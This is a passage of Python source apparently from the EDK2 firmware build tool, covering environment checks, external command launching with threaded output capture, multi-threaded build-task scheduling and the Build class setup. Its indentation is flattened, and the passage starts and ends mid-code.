# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if 'PATHEXT' in os.environ:
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of the above environment variables is not set or has an error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entry method of the thread that reads the output of an external program and
# puts it into the STDOUT/STDERR of the current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag,MemTo=None):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
LineStr = Line.rstrip().decode(encoding='utf-8', errors='ignore')
if MemTo is not None:
if "Note: including file:" == LineStr.lstrip()[:21]:
MemTo.append(LineStr)
else:
To(LineStr)
MemTo.append(LineStr)
else:
To(LineStr)
else:
break
if ExitFlag.is_set():
break
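## Popen subclass that records the redirected output of the child process
#
# ProcOut collects the output lines captured by ReadMessage so that they can be
# reused later (e.g. by IncludesAutoGen in LaunchCommand for dependency files).
#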
class MakeSubProc(Popen):
def __init__(self,*args, **argv):
super(MakeSubProc,self).__init__(*args, **argv)
self.ProcOut = []
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting the output of the external program, threads are used to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir,ModuleAuto = None):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first argument in the following Popen().
# It could be a string or a sequence. We found that if Command is a string in the following Popen(),
# Ubuntu may fail with an error message saying the command is not found.
# So here we may need to convert Command from a string to a list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = MakeSubProc(Command, stdout=PIPE, stderr=STDOUT, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure,Proc.ProcOut))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if not isinstance(Command, type("")):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
# check the return code of the program
if Proc.returncode != 0:
if not isinstance(Command, type("")):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
if ModuleAuto:
iau = IncludesAutoGen(WorkingDir,ModuleAuto)
if ModuleAuto.ToolChainFamily == TAB_COMPILER_MSFT:
iau.CreateDepsFileForMsvc(Proc.ProcOut)
else:
iau.UpdateDepsFileforNonMsvc()
iau.UpdateDepsFileforTrim()
iau.CreateModuleDeps()
iau.CreateDepsInclude()
iau.CreateDepsTarget()
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise some build units could be
# missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise some make
# units could be missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, BuildCommand,Target):
Dependency = [ModuleMakeUnit(La, BuildCommand,Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise some make
# units could be missed during the build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, BuildCommand, Target):
Dependency = [ModuleMakeUnit(Lib, BuildCommand, Target) for Lib in Obj.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, BuildCommand, Target) for Mod in Obj.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, to avoid duplicate builds
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.name = "Build-Task-Scheduler"
SchedulerThread.daemon = False
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exit when there are no pending/ready tasks and
# it is indicated to do so, or when an error occurs in a running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.is_set()) and not BuildTask._ErrorFlag.is_set():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = list(BuildTask._PendingQueue.keys())
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.is_set():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) to exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo, Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid a tight loop
time.sleep(0.01)
# avoid a tight loop
time.sleep(0.01)
# wait for all running threads to exit
if BuildTask._ErrorFlag.is_set():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.is_set() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.name for Th in threading.enumerate()))
# avoid a tight loop
time.sleep(0.1)
except BaseException as X:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running methods to exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.is_set()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other threads, we have to
# use threading.Event to communicate this information to the main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.is_set()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other threads, we have to
# use a static variable to communicate this message to the main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is being built or has been built. If
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule and not Dep.BuildObject.CanSkipbyCache(GlobalData.gModuleCacheHit):
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string containing the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir,self.BuildItem.BuildObject)
self.CompleteFlag = True
# Run hash operation post dependency to account for libs
# Run if --hash or --binary-destination
if GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
self.BuildItem.BuildObject.GenModuleHash()
if GlobalData.gBinCacheDest:
self.BuildItem.BuildObject.GenCMakeHash()
except:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.is_set():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.current_thread().name, Command, WorkingDir)
# indicate that a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.name = "build thread"
self.BuildTread.daemon = False
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
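# Pad the image size up to a 0x1000 (4 KB) boundary (always adds at least one page)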
self.Image.Size = (self.Image.Size // 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages, and then establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions,log_q):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = 1
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
self.MakeFileName = ""
TargetObj = TargetTxtDict()
ToolDefObj = ToolDefDict((os.path.join(os.getenv("WORKSPACE"),"Conf")))
self.TargetTxt = TargetObj.Target
self.ToolDef = ToolDefObj.ToolDef
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
GlobalData.gEnableGenfdsMultiThread = not BuildOptions.NoGenfdsMultiThread
GlobalData.gDisableIncludePathCheck = BuildOptions.DisableIncludePathCheck
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
GlobalData.gDatabasePath = os.path.normpath(os.path.join(GlobalData.gConfDirectory, GlobalData.gDatabasePath))
if not os.path.exists(os.path.join(GlobalData.gConfDirectory, '.cache')):
os.makedirs(os.path.join(GlobalData.gConfDirectory, '.cache'))
self.Db = BuildDB
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print a dot character while doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
if "PYTHON3_ENABLE" in os.environ:
PYTHON3_ENABLE = os.environ["PYTHON3_ENABLE"]
if PYTHON3_ENABLE != "TRUE":
PYTHON3_ENABLE = "FALSE"
EdkLogger.quiet("%-16s = %s" % ("PYTHON3_ENABLE", PYTHON3_ENABLE))
if "PYTHON_COMMAND" in os.environ:
EdkLogger.quiet("%-16s = %s" % ("PYTHON_COMMAND", os.environ["PYTHON_COMMAND"]))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
TargetObj = TargetTxtDict()
ToolDefObj = ToolDefDict((os.path.join(os.getenv("WORKSPACE"), "Conf")))
self.TargetTxt = TargetObj.Target
self.ToolDef = ToolDefObj.ToolDef
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
self.AutoGenMgr = None
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
self.log_q = log_q
GlobalData.file_lock = mp.Lock()
# Init cache data for local only
GlobalData.gPackageHashFile = dict()
GlobalData.gModulePreMakeCacheStatus = dict()
GlobalData.gModuleMakeCacheStatus = dict()
GlobalData.gHashChainStatus = dict()
GlobalData.gCMakeHashFile = dict()
GlobalData.gModuleHashFile = dict()
GlobalData.gFileHashDict = dict()
GlobalData.gModuleAllCacheStatus = set()
GlobalData.gModuleCacheHit = set()
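## Run the AutoGen step in worker processes
#
# Spawn an AutoGenManager and self.ThreadNumber AutoGenWorkerInProcess workers,
# pre-create code and makefiles for the PCD driver modules in PcdMaList, and
# return a (Status, ErrorCode) tuple.
#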
def StartAutoGen(self,mqueue, DataPipe,SkipAutoGen,PcdMaList,cqueue):
try:
if SkipAutoGen:
return True,0
feedback_q = mp.Queue()
error_event = mp.Event()
FfsCmd = DataPipe.Get("FfsCommand")
if FfsCmd is None:
FfsCmd = {}
GlobalData.FfsCmd = FfsCmd
auto_workers = [AutoGenWorkerInProcess(mqueue,DataPipe.dump_file,feedback_q,GlobalData.file_lock,cqueue,self.log_q,error_event) for _ in range(self.ThreadNumber)]
self.AutoGenMgr = AutoGenManager(auto_workers,feedback_q,error_event)
self.AutoGenMgr.start()
for w in auto_workers:
w.start()
if PcdMaList is not None:
for PcdMa in PcdMaList:
# The SourceFileList calling sequence impacts the makefile string sequence.
# Create cached SourceFileList here to unify its calling sequence for both
# CanSkipbyPreMakeCache and CreateCodeFile/CreateMakeFile.
RetVal = PcdMa.SourceFileList
# Force cache miss for PCD driver
if GlobalData.gUseHashCache and not GlobalData.gBinCacheDest and self.Target in [None, "", "all"]:
cqueue.put((PcdMa.MetaFile.Path, PcdMa.Arch, "PreMakeCache", False))
PcdMa.CreateCodeFile(False)
PcdMa.CreateMakeFile(False,GenFfsList = DataPipe.Get("FfsCommand").get((PcdMa.MetaFile.Path, PcdMa.Arch),[]))
PcdMa.CreateAsBuiltInf()
# Force cache miss for PCD driver
if GlobalData.gBinCacheSource and self.Target in [None, "", "all"]:
cqueue.put((PcdMa.MetaFile.Path, PcdMa.Arch, "MakeCache", False))
self.AutoGenMgr.join()
rt = self.AutoGenMgr.Status
err = 0
if not rt:
err = UNKNOWN_ERROR
return rt, err
except FatalError as e:
return False, e.args[0]
except:
return False, UNKNOWN_ERROR
## Add TOOLCHAIN and FAMILY declared in DSC [BuildOptions] to ToolsDefTxtDatabase.
#
# Loop through the set of build targets, tool chains, and archs provided on either
# the command line or in target.txt to discover FAMILY and TOOLCHAIN declarations
# in [BuildOptions] sections that may be within !if expressions that may use
# $(TARGET), $(TOOLCHAIN), $(TOOLCHAIN_TAG), or $(ARCH) operands.
#
def GetToolChainAndFamilyFromDsc (self, File):
SavedGlobalDefines = GlobalData.gGlobalDefines.copy()
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for BuildToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = BuildToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = BuildToolChain
for BuildArch in self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = BuildArch
dscobj = self.BuildDatabase[File, BuildArch]
for KeyFamily, Key, KeyCodeBase in dscobj.BuildOptions:
try:
Target, ToolChain, Arch, Tool, Attr = Key.split('_')
except:
continue
if ToolChain == TAB_STAR or Attr != TAB_TOD_DEFINES_FAMILY:
continue
try:
Family = dscobj.BuildOptions[(KeyFamily, Key, KeyCodeBase)]
Family = Family.strip().strip('=').strip()
except:
continue
if TAB_TOD_DEFINES_FAMILY not in self.ToolDef.ToolsDefTxtDatabase:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY] = {}
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY]:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][ToolChain] = Family
if TAB_TOD_DEFINES_BUILDRULEFAMILY not in self.ToolDef.ToolsDefTxtDatabase:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY] = {}
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY]:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][ToolChain] = Family
if TAB_TOD_DEFINES_TOOL_CHAIN_TAG not in self.ToolDef.ToolsDefTxtDatabase:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG] = []
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG].append(ToolChain)
GlobalData.gGlobalDefines = SavedGlobalDefines
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
